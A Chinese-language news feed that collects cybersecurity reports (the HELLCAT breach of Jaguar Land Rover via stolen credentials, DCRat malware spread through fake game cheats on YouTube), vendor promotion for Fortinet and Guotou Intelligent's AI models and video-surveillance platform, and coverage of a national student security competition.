仪表板的屏幕截图,其中显示了其他敏感数据,并确认所使用的凭据与 Hudson Rock 数据库中的凭据相匹配。 攻击方法 HELLCAT 的作案手法是通过网络钓鱼电子邮件、恶意下载或受感染的网站,悄然感染员工设备。 用于实施入侵的登录凭据多年前被 Hudson Rock 的 Cavalier 发现 一旦植入成功,像 Lumma(与施耐德电气漏洞有关)这类信息窃取恶意软件就会提取企业系统的敏感登录凭证,然后在暗网上售卖或交易。在 JLR 漏洞事件中,Rey 确认 Atlassian Jira 实例为入侵入口点后,很明显这些被盗凭证可轻易用于提升权限和提取敏感数据。 被盗凭证的危险性 JLR 泄密事件尤其令人担忧的一点是,被盗凭证存在的时间很长。Hudson Rock 此前已将这些被盗登录信息纳入其庞大数据库。这些凭证在捷豹路虎的系统中依旧有效且未变更,这一情况凸显出公司在凭证管理和轮换方面存在严重疏忽,也凸显了信息窃取恶意软件带来的长期威胁。 APTS 泄露捷豹路虎更多数据 对于企业而言,从中得到的教训十分明确 —— 信息窃取者感染并非孤立事件,而是持续存在的威胁。除非实施强有力的监控、多因素身份验证(MFA)以及及时的凭证轮换,否则被盗取的凭证可能多年都保持有效。 Atlassian Jira 在企业工作流程中至关重要,因其在数据存储方面的核心地位,已成为主要攻击目标。像 HELLCAT 这样的威胁行为者一旦进入系统,就能轻松提升权限并提取数据。 在捷豹路虎评估损失并保护其系统的同时,网络安全社区也在为可能出现的后续攻击做准备。泄露的数据可能会被用于有针对性的网络钓鱼活动或知识产权盗窃,特别是人工智能工具会放大此类违规行为的影响。鉴于 HELLCAT 的得逞,很可能会出现模仿行动,信息窃取者凭证在暗网上依旧备受追捧。 这一事件清晰地警示了主动网络安全措施的重要性,包括完善的凭证管理以及集成网络犯罪情报 API 以增强现有网络安全解决方案。
网络安全研究人员发现了新一波攻击——Dark Crystal RAT(DCRat)。这是一种危险的远程访问木马,它通过恶意软件即服务(MaaS)模型重新出现。 攻击者主要瞄准游戏玩家,通过 YouTube 传播伪装成游戏作弊和破解程序的恶意软件。 恶意软件传播利用 YouTube 平台 DCRat 背后的攻击者将 YouTube 当作主要分发渠道,他们创建虚假或劫持的账户,上传宣传所谓游戏作弊、破解、机器人及类似软件的视频。每个视频描述都包含一个下载链接,引导用户访问托管受密码保护档案的合法文件共享服务,密码也在同一描述中提供,使整个过程看似可信。 YouTube 视频广告,宣传欺骗和破解 但这些档案并非提供所承诺的游戏工具,而是包含隐藏在各种垃圾文件和文件夹中的 DCRat 恶意软件,这些垃圾文件和文件夹旨在分散受害者的注意力。 DCRat,即 Dark Crystal RAT,于 2018 年首次出现,如今已演变成一种复杂的威胁。该恶意软件作为后门运行,让攻击者能远程访问受感染设备。此外,DCRat 支持模块化插件,极大地增强了其功能。研究人员已发现与该恶意软件家族相关的 34 个不同插件,涵盖按键记录、网络摄像头监视、文件盗窃和密码泄露等危险功能。 攻击者网站上的 DCRat 构建器插件 利用动漫主题域名 在基础设施方面,为托管命令和控制(C2)服务器,网络犯罪分子注册了许多二级域名(主要在俄罗斯的 “.ru” 域名区域内),并创建多个三级域名用于操作。仅自 2025 年初以来,攻击者就注册了至少 57 个新的二级域名。有趣的是,这些域名常包含受动漫启发的俚语,如 “nyashka”“nyashkoon” 和 “nyashtyan”,容易引起日本流行文化爱好者的共鸣。 采用特征命名方法的 C2 服务器地址 遥测数据显示,俄罗斯是此次活动的主要目标,约 80% 的感染发生在那里。其他受影响地区包括白俄罗斯、哈萨克斯坦和中国。卡巴斯基安全解决方案将该恶意软件检测为 “Backdoor.MSIL.DCRat”。 专家强烈建议用户只从可信来源下载游戏相关软件,避免因非官方渠道分发的受密码保护档案带来感染风险。
近期,全球知名IT和商业战略咨询公司Enterprise Strategy Group (ESG) 发布《经济效益验证》研究报告,对Fortinet SecOps安全运营解决方案进行了量化优势验证。结果显示,Fortinet安全运营解决方案能够显著帮助企业安全团队提升99%运营效率降低99%运营风险,最少仅需1个月便可收获高达1093%的投资回报率。 行业威胁风云变幻,安全挑战史无前例 随着数字化转型的狂飙突进,企业正置身于前所未有的安全风暴之中。攻击面如潮水般扩张,攻击手段层出不穷,从勒索软件、钓鱼攻击到零日漏洞利用,每一种攻击都对企业构成了严重威胁。传统单点安全产品已难以招架这复杂多变的安全威胁。 据报告深度洞察,高达45%的组织坦言,当前的安全运营难度较两年前有增无减。同时,报告还指出,当前企业面临的主要安全挑战包括威胁态势的迅速演进、攻击面的激增、安全告警的数量和复杂性增加,以及公有云服务使用率的上升带来的新挑战。这些挑战共同构成了企业安全防护的难题。 Fortinet安全运营解决方案深度验证 针对上述挑战,ESG对 Fortinet 安全运营解决方案全部组件进行了定量分析,并对解决方案价值予以验证。报告认为,Fortinet凭借其AI驱动的安全运营解决方案,通过Fortinet Security Fabric安全平台,充分利用融合与整合的强大效能,为整个数字攻击面提供了无懈可击的统一保护。这一解决方案在单一集成体系中实现了便捷性、卓越效能与高度弹性的完美融合。 据ESG的详尽分析显示,Fortinet安全运营解决方案在以下三大关键领域——早期检测和预防(EDP)、SOC平台与服务、网络安全培训及相关准备中,为用户带来了显著的成本节约与经济效益。 早期检测和预防(EDP):Fortinet的EDP技术,如FortiEDR、FortiNDR和FortiDeceptor,实现了威胁检出率的显著提升(94%),误报率接近零。威胁识别时间从数周缩短至1小时内,遏制时间更是从4.2小时降至1分钟。 SOC平台与服务:通过全面融合FortiSIEM、FortiSOAR和FortiXDR等SOC平台和多种服务,Fortinet 方案实现告警误报减少85%,威胁调查与修复自动化率达99%。托管服务(如MDR、SOCaaS)还可减少对专职安全团队的依赖,节省人力成本。 培训与准备服务:FortiPrepare和FortiResponse等提供了丰富的主动安全防护与服务选项,助力用户主动评估并优化其安全态势,员工恶意链接点击率降低84%,安全团队入职培训时间显著缩短。 ESG分析揭示惊人效益与效率飞跃 最终,ESG针对用户部署Fortinet自动化SOC解决方案所能获得的预期时间节省和经济效益,基于威胁平均识别时间指标,对基线案例、EDP(早期检测和预防)案例、以及EDP+SOC平台和服务案例建模,围绕运营成本节省、风险规避以及预期总节省成本三大方面展开分析。 运营成本节省。Fortinet的自动化SOC解决方案高度自动化、智能化,显著降低了人力需求。据ESG报告,部署EDP技术的组织,单次事件平均耗时锐减至约14%(节省86%时间),提高了处理效率,降低了运营成本。同时,Fortinet的托管服务也提供了经济高效的安全运营方式。 风险规避。Fortinet的解决方案全面检测、预防威胁,有效降低了安全风险。用户反馈显示,部署后恶意链接点击人数下降84%,网络钓鱼等威胁得到有效控制。同时,威胁识别时间从168小时缩减至1小时内,甚至数秒;威胁分类时间从8小时缩减至10分钟内;威胁控制时间从4.2小时缩减至1分钟内,快速响应和遏制潜在威胁。 预期总节省成本。综合考虑运营成本节省与风险规避的双重优势,ESG对Fortinet解决方案的预期总节省成本进行了全面评估。结果显示,方案的投资回报率(ROI)高达387%至1093%,投资回报期短至1-2.5个月。安全团队的效率更是提升了99%,相当于为组织节省了12-15名全职员工的工作量。同时,组织风险降低了99%,为企业业务连续性提供了坚不可摧的保障。 ESG的这份报告,无疑是对Fortinet安全运营解决方案在提升组织安全运营效率与降低风险方面卓越能力的客观见证。它不仅揭示了Fortinet在自动化、智能化安全领域的领先地位,也为组织如何打造坚不可摧的安全防线的同时,实现效率和成本的完美兼顾指明了方向。
3月5日,在国投智能的大力支持下,厦门市气象部门成功举办“Qiko+”人工智能创新应用大赛。公司大数据操作系统研究院院长魏超,安全与应急事业部副总经理左军作为大赛评委专家出席。 本次大赛以“智慧气象 E鹭先行——‘Qiko+’人工智能助力厦门气象创新应用”为主题,首次展示由国投智能打造的“Qiko+”大模型接入DeepSeek后在气象场景应用的落地成果,吸引了全市气象部门的积极参与。参赛作品涵盖气象预报、气象灾害预警、公众服务、融媒体制作、数据分析、气象科普、行政管理、行业监管等多个领域,充分展示了厦门市气象部门在人工智能应用方面的探索与成果。 参赛队伍依托国投智能Qiko+智能体创新构建平台构建大模型应用,大大提升了工作效率,如: 大模型基于海量气象业务数据的构建,提供了快速、准确的数据查询服务; 在行政办公场景中,依托大模型的自然语言处理能力,自动化完成应急响应命令、宣传科普文本、会议纪要提炼、公文写作及年报编制等复杂文本工作,将原本需要2-3小时人工输入完成的消息稿件流程压缩至30分钟内完成,保障了业务的时效性; 通过代码编制、工作流等方式,优化了气象数据监控和综合办公的自动化和智能化,提高了业务工作的稳定性和智能化水平; …… 评审现场 比赛现场,参赛者们通过精彩的汇报和演示,展示了“Qiko+”在气象应用中的创新解决方案,现场气氛热烈。参赛团队表示:“这次比赛不仅让我们有机会展示自己的创新成果,还让我们学到了很多其他团队的优秀经验和做法,对我们的未来发展非常有帮助。 ”厦门市气象局党组书记、局长张长安对此次大赛给予了高度评价。他表示,此次大赛学习意义重大,参赛项目亮点纷呈。一是针对业务痛点精准破题,各参赛项目紧密围绕气象工作的实际问题,通过人工智能技术提出了切实可行的解决方案;二是创新形式丰富多彩,充分利用了提示词、知识库、工作流等方式,为气象业务服务开辟了人机协同新路径;三是服务维度全面扩展,充分体现了厦门气象各业务链条AI思维的建立。同时他对国投智能给予的大力支持表示感谢,并期待双方继续推动AI+在智慧气象领域的创新应用,为厦门气象事业的高质量发展贡献力量。
两会热议 如果说以DeepSeek为代表的人工智能技术创新推动了中国大模型技术进入规模化应用的阶段,那么全球首款通用AI代理Manus的发布,无疑将AI大模型的热潮推向了一个新的高度。 2025年3月5日,国务院总理李强作政府工作报告。报告强调,要持续推进“人工智能+”行动,将数字技术与制造优势、市场优势更好结合起来,支持大模型广泛应用。在全国两会上,代表委员们纷纷就“人工智能+”行动发表看法,提出议案和建议。他们普遍认为,“人工智能+”行动是推动传统产业转型升级、培育新兴产业的重要途径,也是提升国家全球竞争地位的关键。因此,加强人工智能与产业的深度融合,推进“人工智能+”行动,已经成为全社会的共识。 “人工智能+”在2024年首次被写入政府工作报告,在2025年的政府工作报告中再次被强调。伴随政策指引的加强以及人工智能技术的快速发展,千行百业广泛应用人工智能,越来越多的学科、领域与人工智能实现深度融合,支持人工智能大模型开发、训练和应用。 作为网络空间安全与社会治理领域国家队,国投智能始终致力于探索大模型技术的前沿应用。基于自主研发的行业大模型“天擎”和大模型应用创新平台Qiko,构建了完整的大模型技术体系,为千行百业的智能化升级提供强大动力。同时,公司依托在深度合成和生成式AI技术领域的优势,积极开展人工智能大模型技术的深度探索,并推出了一系列智能装备和产品,为有效打击利用AI技术进行的违法犯罪行为提供了有力的技术保障。 智慧基石,“天擎”引领行业智能化 “天擎”行业大模型作为公共安全领域的智慧基石,不仅通过了国家网信办的严格备案,更凭借其丰富的行业知识库和卓越的语言理解、生成及逻辑推理能力,为公共安全领域提供了精准、高效的智能化解决方案。 通过私有化部署,“天擎”能够深度融入行业场景,实现安全可信、贴合实战的智能应用。2024年,“天擎”系列大模型全面升级,引入了多尺寸语言大模型、多模态大模型、代码大模型和RAG模型,进一步提升了模型的泛化能力和应用精度。同时,“天擎”还针对不同垂直领域,构建了多款专业大模型,为行业用户提供更为精准的定制化服务。 创新赋能,Qiko解锁AI应用新篇章 基于“天擎”行业大模型,国投智能推出了自主可控、多端适用的Qiko大模型创新对话平台和Qiko+智能体创新构建平台。 Qiko平台通过一站式服务,解决了行业AI应用落地难、业务融合难、安全保障难、投入成本高等问题,为行业用户提供了便捷、高效的AI应用解决方案。而Qiko+平台则通过智能体构建、可视化工作流编排、RAG知识库和团队AI资产管理等功能,助力行业用户快速构建具备私有知识和业务执行能力的AI应用。 目前,Qiko平台已成功接入DeepSeek,通过技术协同,为公共安全行业提供了更为丰富、精准的智能服务。 安全为先,AI反诈利器支撑打击犯罪 在人工智能安全领域,国投智能推出美亚鉴真系列产品守护人民安全。首发国内第一款深伪视频图像鉴真智能装备——慧眼视频图像鉴真工作站,作为旗舰产品,该产品集成了先进的AI算法和图像处理技术,能够高效识别并验证视频图像的真实性,为司法调查、内容真实性验证等领域提供了强有力的技术保障。 同时,国投智能还在互联网上线“美亚鉴真平台”微信小程序,对深度合成的视频图像、及大模型生成的音视频图像和文本内容进行检测识别,将AI鉴真技术普及至大众层面,用户只需通过手机即可快速获取鉴定结果,有效提升了公众的信息甄别能力。目前,该小程序现已支持接入各地政务服务平台。 实力领先,荣获多项AI领域国家级荣誉 国投智能在人工智能领域的影响力不仅体现在技术创新上,还体现在其积极参与国家标准和国际标准的制定工作中。公司积极参与起草了16项人工智能大模型领域的国家标准和国际标准,其中包括1项IEEE标准和15项国家标准。同时,国投智能还承担了国家重点研发计划项目,负责研究多项生成式人工智能国家标准。 在国家级和省部级人工智能领域重点研发专项和技术攻关项目中,国投智能同样表现突出,参与了科技部、工信部发布的7项国家级课题,以及福建省、厦门市发布的8项省市级课题。此外,公司还参与了国家网信办牵头的《人工智能生成合成内容标识办法》等文件的起草工作,展现了其在行业内的领导地位。 在荣誉方面,国投智能同样硕果累累。公司积极参与由国家互联网信息办公室和公安部联合举办的中国人工智能大赛,并取得优异成绩。在2024年举办的第五届中国人工智能大赛中,国投智能在多个赛道中均荣获最高等级A级证书,展现了其卓越的技术实力和创新能力,截至目前,累计获得A级证书(最高级)6项,B级证书5项。此外,公司还荣获了2021年中国人工智能创新之星、2023最值得关注的AIGC(人工智能生成内容)公司等荣誉称号,进一步巩固了其在人工智能领域的领先地位。 科技向善,AI引领共创智慧未来 国投智能在人工智能领域的深耕细作,不仅推动了公司业务的智能化升级,更为公共安全、社会治理等领域提供了强有力的技术支撑。国投智能董事长滕达表示:“大模型已经从‘原子弹’变成了‘茶叶蛋’,‘桌面式、嵌入式’大模型装备的应用前景值得期待。”不仅揭示了AI大模型从高端科研向普及应用的转变趋势,更体现了国投智能对于AI技术未来发展的坚定信心。 滕达董事长还强调,在推动AI技术创新的同时,必须警惕其可能带来的风险与挑战。因此,国投智能在加强人工智能安全治理技术体系研究的同时,也将继续聚焦大模型技术应用、生成式人工智能和人工智能安全三个核心方向,不断推出更为安全、可信、可靠的人工智能技术产品,为打击利用人工智能的新型涉网犯罪提供有力支持,为维护和保障人工智能规范健康发展贡献力量。 在《政府工作报告》的引领下,国投智能将携手各界合作伙伴,共同推动人工智能技术的创新与应用,为构建智慧社会、实现科技强国目标贡献力量。未来,国投智能将继续以科技创新为引领,以智慧应用为目标,不断推动人工智能技术的深度发展,为人类社会的美好未来贡献更多“国投智慧”。
数智化时代,视频安防领域正经历着一场深刻且具开创性的变革。大模型技术凭借其卓越的技术优势,也为视频安防带来了一系列智能化应用,有力推动了安防领域的提档升级,在维护社会安全稳定方面发挥着日益重要的作用。 近期,国投智能基于“天擎”公共安全大模型多模态能力对 “慧视” 视图大数据平台进行升级使其在视图检索、视图分类、视图质量治理、实时视频分析与理解等方面的能力实现显著提升同时通过DeepSeek的赋能进一步拓展了平台的应用边界与实用价值 基于自然语言的视图检索 不同于传统通过文件名、关键词备注来检索文件,大模型可直接根据搜索词生成对应的特征向量,并通过这种生成式逻辑去对比视图库里的特征向量,从而能够理解自然语言所描述的图像,在文本和图像之间搭起了桥梁,有效解决了传统图像搜索中“搜不到、搜不准、搜不快”等难题。 例如,城市遭遇暴雨或强降雨时,管理部门若想了解内涝情况,只需在“慧视” 平台相应搜索框输入“路面积水”,系统便能精准理解用户意图,迅速输出所有相关图像,并在电子地图上标绘出相应结果,方便城市管理者查看与处置。 智能视图场景分类 针对人工进行视频图像场景标注时,因主观因素易导致标注不规范、周期长的难题,大模型可对城市海量视频图像迅速开展智能场景分类,自动生成 AI 标签。 “慧视” 平台目前已支持 “机场”“火车站”“学校”“银行”“桥梁”“港口”“公路”“隧道”等超 1000 种场景标签。借助这些 AI 标签,标注效率提升数百倍,数据标注更加规范,极大提升了视频图像场景标注的质量与效率。 通过构建图像标签库,“慧视” 平台实现了图像与业务的智能高效关联,助力用户更迅速地检索到所需图像资源,充分发挥了图像场景分类和标注的实用价值。 视图质量监测与治理 在实际视频安防场景中,视图质量常常参差不齐,存在模糊、灰暗、目标遮挡、不完整等状况,严重影响视图系统效能。 大模型赋能的视频安防系统具备智能视图质量监测与故障诊断能力,通过远程监测与分析视频画面,能及时发现摄像机角度偏差、遮挡物、重复抓拍及信息无效等异常,同时提供对应解决方案,确保视图画面清晰、完整和可用,为后续视图智能分析及决策提供高质量数据支撑。 目前,“慧视” 平台能提供20多种视图质量检测工具,自动发现人工治理难以发现的问题,并通过声光报警、短信及电话等途径,迅速通知责任单位查纠整改,大幅提升视图质量治理效率。 视频场景分析与理解 大模型不仅擅长处理文字与图像数据,在解读视频数据方面同样表现卓越。早期,视频分析技术主要用于提取目标信息以及分析特定事件等,如今已演进至基于大模型的视频场景分析阶段。大模型能够深度挖掘视频画面中潜藏的信息,捕捉丰富细节,实现对各类场景的深入理解。 基于大模型的实时视频流识别和理解技术,是视频安防领域的又一重大突破。如在高速公路场景中,大模型凭借强大的图像分析能力,对车来车往的视频画面进行毫秒级解析,及时识别出路面上的两车道之间存在不明障碍物。 同时,大模型会依据交通流数据与过往事故案例,精准评估风险,一旦判定障碍物可能导致车辆因减速或急刹车引发交通事故,便立即向交通管理者发出预警。该技术为保障交通顺畅与公共安全提供了有力支撑,极大提升了视频安防系统的智能化水平与响应效率。 在视频场景理解中,实时解析视频内容对算力资源的要求较高,场景筛选与算法配置便尤为关键。通过合理选点,优化相关配置与算法,既能满足实时性要求,又能最大程度降低算力消耗,实现高效且精准的视频场景理解,为后续各类视图应用提供大模型能力的支撑,推动其高效运作与深度拓展。 安防智能体的应用 为进一步提升公共安全场景中的环境感知、智能分析与辅助决策能力,升级后的“慧视” 平台可构建多个大小模型结合、图数融合的安防智能体,不仅能够实时监测和分析视频数据,还能根据实际情况提供智能决策建议,协助相关人员进行高效的安全管理。 它们不仅仅是帮忙 “看”,更重要的是协助 “干”,通过智能化的手段,实现对安全事件的快速响应和有效处理,全方位构建起坚实的公共安全防护体系,推动公共安全管理迈向更高水平。 视频安防从早期单纯 “看得见”,发展到 “看得清”,再进阶至 “看得懂”。如今,在大模型的赋能下,已实现 “看得透” 的质的飞跃。在城市安防体系中,前端视频感知网络已按需搭建,亟待强化视频大脑建设,让前端采集的视图信息得以实时精准分析并预警。只要具备充足算力,每一路摄像机都能借助大模型开展分析,进一步提升视频安防的智能化程度。 大模型深度赋能视频安防,显著提升系统对复杂场景的理解及分析能力,有力推动其向智能化高阶发展。在此过程中,DeepSeek 通过算法优化、高效模型架构以及创新数据处理技术等,打造出强大的多模态处理能力,在视图分析与理解领域展现出巨大应用潜力。伴随着技术的持续迭代,DeepSeek 为代表的大模型在可控成本下不断挖掘潜能,持续为安防系统的智能化升级注入强劲动力,为守护社会安全稳定构筑起坚固防线。
3月16日,由中央网络安全和信息化委员会办公室、教育部、国家市场监督管理总局、国家数据局指导,中国信息安全测评中心和北京师范大学、中国电信集团有限公司、中国移动通信集团有限公司联合主办的第十八届全国大学生信息安全竞赛(创新实践能力赛)暨第二届“长城杯”铁人三项赛(防护赛)(以下简称“大赛”)半决赛,在天津、浙江、广东、四川和陕西五大赛区同步举办。本次半决赛技术支持单位为北京中测安华科技有限公司、启明星辰信息技术集团股份有限公司、北京西普阳光科技有限公司、奇安信科技集团股份有限公司、永信至诚科技集团股份有限公司、北京长亭科技有限公司。 天津赛区半决赛开幕现场 浙江赛区半决赛开幕现场 广东赛区半决赛开幕现场 四川赛区半决赛开幕现场 陕西赛区半决赛开幕现场 本届大赛以“智能防护,开启数字安全新时代”为主题,面向高等院校全日制在校学生开展。半决赛采取实战化的攻防对抗(AWDP)与综合渗透(ISW)双赛道设计,突出以赛促学、以赛育才,推动高校教育科技人才一体发展,选拔具备创新能力和技术韧性的高、精、尖人才,为筑牢网络强国人才基石注入新动能。 天津赛区半决赛比赛现场 浙江赛区半决赛比赛现场 广东赛区半决赛比赛现场 四川赛区半决赛比赛现场 陕西赛区半决赛比赛现场 本次半决赛共有来自五个赛区326所高校、500支队伍的1943名学生参赛。五个赛区共有80支队伍晋级第十八届全国大学生信息安全竞赛(创新实践能力赛)总决赛。同时,根据半决赛各赛区的成绩排名,各赛区前20支队伍(全国共100支队伍)晋级第二届“长城杯”铁人三项赛(防护赛)决赛。晋级名单将在赛事官方网站(http://www.ciscn.cn和http://ccb.itsec.gov.cn/)公布。此外,各赛区排名前40位的参赛队伍获得奖金,所有半决赛参赛选手均获得国家信息安全水平考试(NISP)一级证书。 天津赛区半决赛在天津理工大学举行,由天津理工大学承办,天津市社会科学界联合会、永信至诚科技集团股份有限公司、三六零数字安全科技集团协办。中国信息安全测评中心副书记吴海燕、天津理工大学副校长叶宁等出席天津赛区半决赛启动仪式。来自吉林大学、哈尔滨工业大学、山东警察学院的队伍取得天津赛区半决赛前三名。 天津赛区半决赛颁奖现场 浙江赛区半决赛在杭州电子科技大学举行,由杭州电子科技大学承办,杭州安恒信息技术股份有限公司、杭州凌武科技有限公司协办。教育部高等学校网络空间安全专业教学指导委员会秘书长封化民、中国信息安全测评中心副主任张涛、杭州电子科技大学副校长李文钧等出席浙江赛区半决赛启动仪式。国家市场监督管理总局和国家数据局也派代表参加当天的活动。来自上海交通大学、合肥师范学院、复旦大学的队伍取得浙江赛区半决赛前三名。 浙江赛区半决赛颁奖现场 广东赛区半决赛在暨南大学(番禺校区)举行,由暨南大学、广东省网络空间安全产业创新联合会承办,广东省信息安全测评中心、广州锦行网络科技有限公司、永信志诚科技集团股份有限公司、杭州领信数科信息技术有限公司、北京军安中科信息技术有限公司、广东丰扬天思文化传播有限公司协办。中国信息安全测评中心副主任李云祺、暨南大学党委副书记陈莹等出席广东赛区半决赛启动仪式。来自广州大学、广东外语外贸大学、海南大学的队伍取得广东赛区半决赛前三名。 广东赛区半决赛颁奖现场 四川赛区半决赛在成都信息工程大学双流新型产业学院举行,由成都信息工程大学、四川省网络空间安全协会承办,成都市双流区人民政府、中国电信股份有限公司四川分公司、中国电子科技网络信息安全有限公司协办。中国信息安全测评中心领导石竑松、成都信息工程大学党委书记沈火明、北京电子科技学院副校长谢四江、中共四川省委网络安全和信息化委员会办公室总工程师何力等出席四川赛区半决赛启动仪式。来自四川大学、西南石油大学(南充校区)、国防科技大学的队伍取得四川赛区半决赛前三名。 四川赛区半决赛颁奖现场 陕西赛区半决赛在西安邮电大学长安校区举行,由西安邮电大学承办。西安邮电大学校长卢光跃,中国信息安全测评中心副主任温哲,陕西省数据和政务服务局党组成员、副局长白婷等出席陕西赛区半决赛启动仪式。来自西北大学、西安理工大学、郑州大学的队伍取得陕西赛区半决赛前三名。 陕西赛区半决赛颁奖现场 第二届“长城杯”铁人三项赛(防护赛)决赛将于2025年4月在福建福州与第八届数字中国建设峰会同期举办。本次大赛不仅是一场技术的较量,也是青春的拼搏。期待晋级选手在决赛中突破自我,以扎实的技术攀登网络空间安全高峰,为网络强国建设贡献青春力量。
您可以订阅此RSS以获取更多信息